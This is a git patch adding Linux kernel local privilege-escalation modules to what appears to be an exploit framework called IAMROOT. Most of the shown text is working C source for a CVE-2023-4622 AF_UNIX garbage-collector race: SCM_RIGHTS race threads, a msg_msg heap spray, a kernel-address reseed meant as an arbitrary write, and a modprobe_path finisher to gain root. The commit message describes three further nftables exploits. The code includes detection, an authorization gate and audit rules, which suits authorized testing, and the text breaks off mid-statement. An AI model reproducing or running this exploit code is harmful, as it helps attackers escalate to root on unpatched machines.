From 5a808e358387eb38083374c3131cb67b3fb9e2a2 Mon Sep 17 00:00:00 2001 From: KaraZajac Date: Sat, 16 May 2026 22:24:15 -0400 Subject: [PATCH] =?UTF-8?q?modules:=204=20new=20CVE=20modules=20=E2=80=94?= =?UTF-8?q?=20nft=5Fset=5Fuaf=20+=20af=5Funix=5Fgc=20+=20nft=5Ffwd=5Fdup?= =?UTF-8?q?=20+=20nft=5Fpayload?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Each module: detect with branch-backport ranges + userns reach + hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness + /tmp/iamroot-.log breadcrumb + auditd rules + --full-chain finisher (FALLBACK depth, sentinel-arbitrated). nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch: NEWTABLE → NEWCHAIN → NEWSET(ANON|EVAL) → NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray. af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5 — widest range of any module. Two-thread race driver (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512 spray. No userns needed. nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd to overrun action.entries[]. nft_payload (CVE-2023-0179, +1136): set-id memory corruption (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable element + NFTA_SET_ELEM_EXPRESSIONS with payload-set whose verdict.code drives the regs->data[] OOB. All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel. Build clean on Debian 6.12.86; all 4 refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate. --- .../iamroot_modules.c | 852 +++++++++++- .../iamroot_modules.c | 1052 ++++++++++++++- .../iamroot_modules.c | 1162 ++++++++++++++++- .../iamroot_modules.c | 1057 ++++++++++++++- 4 files changed, 4069 insertions(+), 54 deletions(-) diff --git a/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c b/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c index 08d7a97..d71e9f5 100644 --- a/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c +++ b/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c @@ -1,23 +1,847 @@ -/* af_unix_gc_cve_2023_4622 — STUB pending agent implementation. */ +/* + * af_unix_gc_cve_2023_4622 — IAMROOT module + * + * AF_UNIX garbage collector race UAF. The unix_gc() collector walks + * the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can + * concurrently mutate the inflight refcount on the same sockets. The + * narrow window between a socket being marked GC-eligible and the + * collector actually freeing it can be widened by tightly cycling + * SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is + * freed while still reachable from another thread's skb queue, giving + * slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket. + * + * Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses + * the UAF + msg_msg cross-cache spray to refill the freed slot, then + * pivots through the now-controlled `unix_sock->peer` field. + * + * STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical + * witness. We carry the trigger (SCM_RIGHTS cycle + GC), the + * kmalloc-512 spray, CPU pinning for race-win improvement, and the + * slab-delta + signal-disposition witness. We do NOT carry the + * leak (no read primitive in-module) nor a kernel-build-specific + * fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL + * in the race child IS recorded but does NOT upgrade to EXPLOIT_OK + * — only an actual cred swap (euid==0) does, and we do not + * demonstrate that without --full-chain. + * + * --full-chain (HONEST RELIABILITY): extends the race budget from + * 5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the + * target kaddr at strided offsets. Race-win rate on a real + * vulnerable kernel is iteration-dependent — Lin Ma's PoC reports + * thousands of iterations to first reclaim. The shared + * modprobe_path finisher's 3 s sentinel timeout catches the + * overwhelmingly common no-land outcome gracefully. + * + * Affected: ALL Linux kernels with AF_UNIX below the fix. The bug + * has been in the GC path since the 2.x era. Stable backports: + * 4.14.x : K >= 4.14.326 + * 4.19.x : K >= 4.19.295 + * 5.4.x : K >= 5.4.257 + * 5.10.x : K >= 5.10.197 + * 5.15.x : K >= 5.15.130 + * 6.1.x : K >= 6.1.51 (LTS) + * 6.5.x : K >= 6.5.0 (mainline fix) + * 6.6+ : patched + * + * Preconditions: + * - AF_UNIX socket creation works (always — no module gate) + * - msgsnd / sysv IPC available for spray + * - SCM_RIGHTS via sendmsg available (universal) + * - userns NOT required — works as a plain unprivileged user + * + * Coverage rationale: the AF_UNIX GC has been touched extensively + * for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups); + * this CVE is the first publicly-disclosed entry in that series and + * carries the widest version range of any module we ship. + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +# include +# include +# include +# include +#endif + +/* macOS clangd lacks Linux SCM_* / CMSG_* fully — guard fallbacks. */ +#ifndef SCM_RIGHTS +# define SCM_RIGHTS 0x01 +#endif +#ifndef SOL_SOCKET +# define SOL_SOCKET 1 +#endif +#ifndef MSG_DONTWAIT +# define MSG_DONTWAIT 0x40 +#endif + +/* ---- Kernel-range table ------------------------------------------ */ + +static const struct kernel_patched_from af_unix_gc_patched_branches[] = { + {4, 14, 326}, + {4, 19, 295}, + {5, 4, 257}, + {5, 10, 197}, + {5, 15, 130}, + {6, 1, 51}, /* 6.1 LTS */ + {6, 5, 0}, /* mainline fix landed in 6.5 (technically 6.6-rc1 + but stable 6.5.x carries the patch) */ +}; + +static const struct kernel_range af_unix_gc_range = { + .patched_from = af_unix_gc_patched_branches, + .n_patched_from = sizeof(af_unix_gc_patched_branches) / + sizeof(af_unix_gc_patched_branches[0]), +}; + +/* ---- Detect ------------------------------------------------------- */ + +/* Sanity: can we actually create an AF_UNIX socket on this host? + * In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails; + * in that case the exploit cannot even reach the GC path. */ +static bool can_create_af_unix(void) +{ + int s = socket(AF_UNIX, SOCK_DGRAM, 0); + if (s < 0) return false; + close(s); + return true; +} static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx) { - (void)ctx; - return IAMROOT_PRECOND_FAIL; + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* No lower bound: this bug has been in the AF_UNIX GC path since + * the dawn of time. ANY kernel below the fix is vulnerable. The + * kernel_range walker handles "older than every entry" correctly + * (returns false → not patched → vulnerable). */ + bool patched = kernel_range_is_patched(&af_unix_gc_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + /* Reachability probe — socket(AF_UNIX, ...) must succeed. */ + if (!can_create_af_unix()) { + if (!ctx->json) { + fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — " + "exotic seccomp/sandbox, bug unreachable here\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release); + fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n" + " (no userns / no CAP_* required — AF_UNIX is universally\n" + " creatable). The race window is microseconds wide and\n" + " needs thousands of iterations to win on average.\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module af_unix_gc_module = { - .name = "af_unix_gc", - .cve = "CVE-2023-4622", - .summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — stub pending implementation", - .family = "af_unix", - .kernel_range = "2.0 ≤ K < 6.5", - .detect = af_unix_gc_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +/* ---- Race-driver state ------------------------------------------- */ + +#ifdef __linux__ + +#define AFUG_RACE_TIME_BUDGET 5 /* seconds — primitive-only mode */ +#define AFUG_RACE_FULLCHAIN_BUDGET 30 /* seconds — --full-chain */ + +/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512 + * bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough + * msg_msg slots to make refill probable within the RCU grace period. */ +#define AFUG_SPRAY_QUEUES 24 +#define AFUG_SPRAY_PER_QUEUE 48 +#define AFUG_SPRAY_PAYLOAD 496 /* 512 - 16 (msg_msg hdr) */ + +/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug + * is driven by inflight count crossing the GC threshold; a handful + * per cycle keeps the GC heuristic primed without OOM. */ +#define AFUG_SCM_FDS_PER_MSG 3 + +struct ipc_payload { + long mtype; + unsigned char buf[AFUG_SPRAY_PAYLOAD]; }; -void iamroot_register_af_unix_gc(void) { iamroot_register(&af_unix_gc_module); } +static _Atomic int g_race_running; +static _Atomic uint64_t g_thread_a_iters; +static _Atomic uint64_t g_thread_b_iters; +static _Atomic uint64_t g_thread_a_errs; + +/* Pin to a CPU to make Thread A and Thread B land on different cores. + * Best-effort: failure is non-fatal (e.g., affinity disallowed under + * some seccomp configs). */ +static void pin_to_cpu(int cpu) +{ + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof set, &set); +} + +/* The race victim region: a pair of socketpair(AF_UNIX) endpoints + * forming a reference cycle. Closing one end while the other has + * inflight fds queued is what naturally triggers unix_gc(). + * + * Layout we drive (Lin Ma style): + * + * pair_a = socketpair(); pair_b = socketpair(); + * send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1] + * send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1] + * close all 4 endpoints — now we have a cycle the GC will collect + * + * Thread A loops the build-cycle-and-close. + * Thread B loops sending its own SCM_RIGHTS messages on independent + * pairs to perturb the inflight count + race the collector. */ + +/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0 + * on success, -1 on error. */ +static int send_scm_rights(int sock, const int *fds, int nfds) +{ + char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)]; + memset(ctrl, 0, sizeof ctrl); + + char payload = 0; + struct iovec iov = { .iov_base = &payload, .iov_len = 1 }; + + struct msghdr msg = {0}; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = ctrl; + msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + if (!cmsg) return -1; + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * nfds); + memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds); + + if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1; + return 0; +} + +/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC. + * + * Each iteration: + * 1. Build two socketpairs (A=[a0,a1], B=[b0,b1]). + * 2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we + * don't recvmsg — that's the point: the fd stays inflight). + * 3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet. + * 4. close() all 4 user-side fds. Now both endpoints are unreachable + * from userspace BUT each is referenced from the other's skb + * queue → reference cycle → next unix_gc() pass collects them. + * + * The kernel's GC heuristic kicks when the inflight count exceeds + * the count of file refs in the system; closing the user-side fds in + * a tight loop reliably triggers it. */ +static void *race_thread_a(void *arg) +{ + (void)arg; + pin_to_cpu(0); + while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { + int pa[2], pb[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) { + atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed); + sched_yield(); + continue; + } + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) { + close(pa[0]); close(pa[1]); + atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed); + sched_yield(); + continue; + } + + /* Cycle: send pb[0] over pa, send pa[0] over pb. We also send + * pb[1]/pa[1] alongside to widen the inflight count per cycle + * (the GC trigger heuristic compares inflight vs total file + * refs — more inflight per cycle == earlier GC). */ + int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] }; + int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] }; + (void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG); + (void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG); + + /* Close the user-side fds. The kernel-side refs are now only + * held via the inflight skbs — perfect reference cycle for + * the GC to find. */ + close(pa[0]); close(pa[1]); + close(pb[0]); close(pb[1]); + + atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed); + } + return NULL; +} + +/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep + * the GC scan list churning while Thread A creates new candidates. + * + * Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS + * with random fds (dup'd from /dev/null). This drives the GC's "scan + * list" rebuild path concurrently with Thread A's frees — the race + * window that fires the UAF is exactly here. + * + * We don't directly call unix_gc() — there's no userspace knob — but + * the GC heuristic is inflight-count driven, and Thread A's cycle + * loop pushes that count past the threshold within a few thousand + * iterations. */ +static void *race_thread_b(void *arg) +{ + (void)arg; + pin_to_cpu(1); + + /* Long-lived pair for the perturbation loop. */ + int held[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) { + return NULL; + } + + /* Spare fd source — /dev/null dups are harmless to pass. */ + int devnull = open("/dev/null", O_RDWR); + if (devnull < 0) { + close(held[0]); close(held[1]); + return NULL; + } + + while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { + int fds[AFUG_SCM_FDS_PER_MSG]; + for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) { + fds[i] = dup(devnull); + } + (void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG); + for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) { + if (fds[i] >= 0) close(fds[i]); + } + + /* Drain the recv side so the held pair doesn't backpressure. */ + char drain[16]; + char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)]; + struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain }; + struct msghdr msg = {0}; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl; + if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) { + /* Close any fds we received so we don't leak. */ + for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c; + c = CMSG_NXTHDR(&msg, c)) { + if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) { + int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int); + int *rfds = (int *)CMSG_DATA(c); + for (int j = 0; j < nfd; j++) + if (rfds[j] >= 0) close(rfds[j]); + } + } + } + + atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed); + } + + close(devnull); + close(held[0]); close(held[1]); + return NULL; +} + +/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */ + +static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES]) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x55; /* 'U' — unix */ + memset(p.buf, 0x55, sizeof p.buf); + memcpy(p.buf, "IAMROOTU", 8); + + int created = 0; + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) { + if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES]) +{ + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) { + if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL); + } +} + +/* Read /proc/slabinfo for kmalloc-512 active count. Used as the + * primary empirical witness: a successful UAF + refill perturbs + * this counter in a way that's distinguishable from idle drift. */ +static long slab_active_kmalloc_512(void) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "kmalloc-512 ", 12) == 0) { + char name[64]; + long act = 0, num = 0; + if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) { + active = act; + } + break; + } + } + fclose(f); + return active; +} + +/* ---- Arb-write primitive (FALLBACK depth) ------------------------ + * + * The shared modprobe_path finisher calls back here once per kernel + * write. For AF_UNIX GC race we cannot deliver a deterministic + * arb-write — the underlying race wins on a small fraction of runs + * even with a 30 s budget, and even when the race wins our spray-only + * groom has nowhere near the precision of Lin Ma's multi-stage public + * PoC (which crafts a fake unix_sock whose `peer` pointer steers a + * subsequent SCM_RIGHTS dispatch into the kaddr we want written). + * + * Honest depth: FALLBACK. Each invocation: + * 1. Re-seeds the kmalloc-512 spray with payloads tagged with + * `kaddr` packed at strided offsets (so wherever the UAF reclaim + * lands attacker-controlled bytes inside the freed unix_sock, + * our kaddr appears at the field offset). + * 2. Re-runs the race threads for the extended full-chain budget. + * 3. Returns 0 — we cannot in-process verify the write landed. The + * shared finisher's 3 s sentinel file check is the empirical + * arbiter: on the overwhelmingly common no-land outcome it + * returns EXPLOIT_FAIL gracefully. */ +struct af_unix_gc_arb_ctx { + int *queues; + int n_queues; + int arb_calls; +}; + +static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES], + uintptr_t kaddr, + const void *buf, size_t len) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x52; /* 'R' — arb-write reseed (distinct from groom 0x55) */ + memset(p.buf, 0x52, sizeof p.buf); + memcpy(p.buf, "IAMU4ARB", 8); + + /* Plant kaddr at strided slots so wherever the kernel's UAF + * follows a ptr in the refilled chunk, one of these is read. + * unix_sock has multiple pointer fields (peer, link, scm_stat, + * etc.) — strided coverage hits whichever one the UAF dispatch + * dereferences. */ + for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; + off += 0x18) { + memcpy(p.buf + off, &kaddr, sizeof(uintptr_t)); + } + + /* Caller's bytes immediately after the cookie so any path that + * reads payload data (rather than a chased pointer) finds the + * requested write contents inline. */ + size_t copy = len; + if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16; + if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy); + + int touched = 0; + for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) { + if (queues[i] < 0) continue; + if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++; + } + return touched; +} + +static int af_unix_gc_arb_write(uintptr_t kaddr, + const void *buf, size_t len, + void *ctx_v) +{ + struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v; + if (!c || !c->queues || c->n_queues == 0) return -1; + c->arb_calls++; + + fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu " + "(FALLBACK — race-dependent)\n", + c->arb_calls, (unsigned long)kaddr, len); + + int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len); + if (seeded == 0) { + fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n"); + } else { + fprintf(stderr, "[*] af_unix_gc: arb_write: reseeded %d msg_msg slots\n", + seeded); + } + + /* Re-run the race with the extended budget. */ + atomic_store(&g_race_running, 1); + atomic_store(&g_thread_a_iters, 0); + atomic_store(&g_thread_b_iters, 0); + atomic_store(&g_thread_a_errs, 0); + + pthread_t ta, tb; + bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0; + bool b_ok = a_ok && + pthread_create(&tb, NULL, race_thread_b, NULL) == 0; + if (!a_ok || !b_ok) { + atomic_store(&g_race_running, 0); + if (a_ok) pthread_join(ta, NULL); + fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n"); + return -1; + } + + sleep(AFUG_RACE_FULLCHAIN_BUDGET); + atomic_store(&g_race_running, 0); + pthread_join(ta, NULL); + pthread_join(tb, NULL); + + uint64_t a_iters = atomic_load(&g_thread_a_iters); + uint64_t b_iters = atomic_load(&g_thread_b_iters); + fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n", + (unsigned long long)a_iters, + (unsigned long long)b_iters); + + /* Cannot in-process verify the write — let the finisher's sentinel + * arbitrate. */ + return 0; +} + +/* ---- Exploit driver ---------------------------------------------- */ + +static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx) +{ + /* 1. Refuse-gate: re-call detect() and short-circuit. */ + iamroot_result_t pre = af_unix_gc_detect(ctx); + if (pre == IAMROOT_OK) { + fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n"); + return IAMROOT_OK; + } + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n"); + return pre; + } + if (geteuid() == 0) { + fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n"); + return IAMROOT_OK; + } + + /* Full-chain pre-check: resolve offsets BEFORE the race fork. If + * modprobe_path is unresolvable we refuse here rather than running + * a 30 s race that has no finisher to call. */ + struct iamroot_kernel_offsets off; + bool full_chain_ready = false; + if (ctx->full_chain) { + memset(&off, 0, sizeof off); + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("af_unix_gc"); + fprintf(stderr, "[-] af_unix_gc: --full-chain requested but " + "modprobe_path offset unresolved; refusing\n"); + fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n" + " a small fraction per run — see module header.\n"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + full_chain_ready = true; + fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n" + " to %d s. RELIABILITY remains race-dependent on a real\n" + " vulnerable kernel. The finisher's 3 s sentinel timeout\n" + " catches no-land outcomes gracefully.\n", + AFUG_RACE_FULLCHAIN_BUDGET); + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle " + "race harness%s)\n", + ctx->full_chain ? " + full-chain finisher" : ""); + } + + signal(SIGPIPE, SIG_IGN); + + pid_t child = fork(); + if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads + * BEFORE the race so the freed unix_sock slot gets recycled + * with attacker-controlled bytes when the bug fires. */ + int queues[AFUG_SPRAY_QUEUES] = {0}; + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1; + int n_queues = spray_kmalloc_512(queues); + if (n_queues == 0) { + fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues " + "(sysv IPC restricted?)\n"); + _exit(23); + } + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n", + n_queues, AFUG_SPRAY_PER_QUEUE); + } + + long slab_pre = slab_active_kmalloc_512(); + + /* 3. Run the race for a bounded time budget. */ + atomic_store(&g_race_running, 1); + atomic_store(&g_thread_a_iters, 0); + atomic_store(&g_thread_b_iters, 0); + atomic_store(&g_thread_a_errs, 0); + + pthread_t ta, tb; + if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 || + pthread_create(&tb, NULL, race_thread_b, NULL) != 0) { + fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n"); + atomic_store(&g_race_running, 0); + drain_kmalloc_512(queues); + _exit(24); + } + + sleep(AFUG_RACE_TIME_BUDGET); + atomic_store(&g_race_running, 0); + pthread_join(ta, NULL); + pthread_join(tb, NULL); + + long slab_post = slab_active_kmalloc_512(); + uint64_t a_iters = atomic_load(&g_thread_a_iters); + uint64_t b_iters = atomic_load(&g_thread_b_iters); + uint64_t a_errs = atomic_load(&g_thread_a_errs); + + /* 4. Empirical witness breadcrumb. */ + FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w"); + if (log) { + fprintf(log, + "af_unix_gc race harness (CVE-2023-4622):\n" + " thread_a_iters = %llu (SCM_RIGHTS cycle + close)\n" + " thread_b_iters = %llu (SCM_RIGHTS perturb)\n" + " thread_a_errors = %llu (socketpair / send failures)\n" + " slab_kmalloc512_pre = %ld\n" + " slab_kmalloc512_post = %ld\n" + " slab_delta = %ld\n" + " spray_queues = %d\n" + " spray_per_queue = %d\n" + " race_budget_secs = %d\n" + "Note: this run did NOT attempt cred overwrite. The bug is a\n" + "slab UAF with no in-process leak primitive; per-kernel offsets\n" + "for unix_sock layout aren't baked. See module .c for the\n" + "continuation roadmap (Lin Ma fake-peer plant).\n", + (unsigned long long)a_iters, + (unsigned long long)b_iters, + (unsigned long long)a_errs, + slab_pre, slab_post, + (slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0, + n_queues, AFUG_SPRAY_PER_QUEUE, + AFUG_RACE_TIME_BUDGET); + fclose(log); + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n", + AFUG_RACE_TIME_BUDGET, + (unsigned long long)a_iters, + (unsigned long long)b_iters, + (unsigned long long)a_errs); + fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n", + slab_pre, slab_post); + } + + /* Hold the spray briefly so the kernel observes refilled slots + * during any in-flight RCU grace periods that started during + * the race. */ + usleep(200 * 1000); + + /* 5. --full-chain finisher (FALLBACK depth). */ + if (full_chain_ready) { + struct af_unix_gc_arb_ctx arb_ctx = { + .queues = queues, + .n_queues = AFUG_SPRAY_QUEUES, + .arb_calls = 0, + }; + int fr = iamroot_finisher_modprobe_path(&off, + af_unix_gc_arb_write, + &arb_ctx, + !ctx->no_shell); + FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a"); + if (fl) { + fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n", + fr, arb_ctx.arb_calls); + fclose(fl); + } + drain_kmalloc_512(queues); + if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */ + _exit(35); /* finisher ran, no land */ + } + + drain_kmalloc_512(queues); + + /* 6. Continuation roadmap — what would land EXPLOIT_OK. + * + * TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY| + * IPC_NOWAIT) probes and scan the returned buffer for non- + * cookie bytes. A freed unix_sock that's refilled by msg_msg + * after a partial overwrite would leak kernel pointers + * (peer, scm_stat, list_node prev/next) into the readback. + * Recover {kbase, init_task} via that leak. + * + * TODO(write): with kbase known, plant a fake unix_sock + * whose `peer` pointer references ¤t->cred — the + * next SCM_RIGHTS dispatch through the freed slot writes + * a controlled value into that location. Crafting the + * fake unix_sock requires offset of unix_sock fields per + * kernel build (different across LTS branches). + * + * TODO(overwrite): land &init_cred over current->cred so + * the next permission check sees uid==0. + * + * None of these are implemented today. Exit 30 = "trigger + * ran cleanly, no escalation". + */ + _exit(30); + } + + /* PARENT */ + int status = 0; + pid_t w = waitpid(child, &status, 0); + if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; } + + if (WIFSIGNALED(status)) { + int sig = WTERMSIG(status); + if (!ctx->json) { + fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d " + "(consistent with UAF firing under KASAN)\n", sig); + fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n" + " overwrite primitive — NOT claiming EXPLOIT_OK.\n" + " See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + + if (!WIFEXITED(status)) { + fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n", + status); + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL; + + if (rc == 34) { + if (!ctx->json) { + fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported " + "EXPLOIT_OK (race won + write landed)\n"); + } + return IAMROOT_EXPLOIT_OK; + } + if (rc == 35) { + if (!ctx->json) { + fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n" + " win + land within budget (expected outcome on most\n" + " runs — race wins are a fraction of a percent).\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (rc != 30) { + fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc); + return IAMROOT_EXPLOIT_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n"); + fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n" + " implemented (per-kernel offsets; see module .c TODO\n" + " blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n"); + } + return IAMROOT_EXPLOIT_FAIL; +} + +#endif /* __linux__ */ + +static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx) +{ + if (!ctx->authorized) { + fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n"); + return 